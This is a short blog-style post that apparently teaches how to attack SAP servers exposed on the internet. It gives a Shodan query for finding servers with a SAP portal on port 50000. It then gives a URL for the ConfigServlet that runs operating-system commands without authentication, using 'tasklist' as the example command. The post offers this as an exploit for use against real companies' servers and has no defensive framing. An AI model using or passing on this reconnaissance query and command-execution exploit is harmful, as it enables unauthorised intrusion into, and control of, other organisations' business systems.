SAP is the most popular business application. More than 180000 customers worldwide have it.
Companies like Nike, Coca-Cola, Sony working... with SAP systems
In this post, we are going to talk about how we can exploit this weaknesses.
First of all, we need to locate possibles SAP vulnerables servers. As usual, we are going to use Shodan.
http://www.shodanhq.com/search?q=%2Firj%2Fportal+50000
Then, we are going to execute commands on the SAP server through our web browser using the nexts URL queries without authentication.
http://xxxx.xxx:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=tasklist
We can see the running processes on the server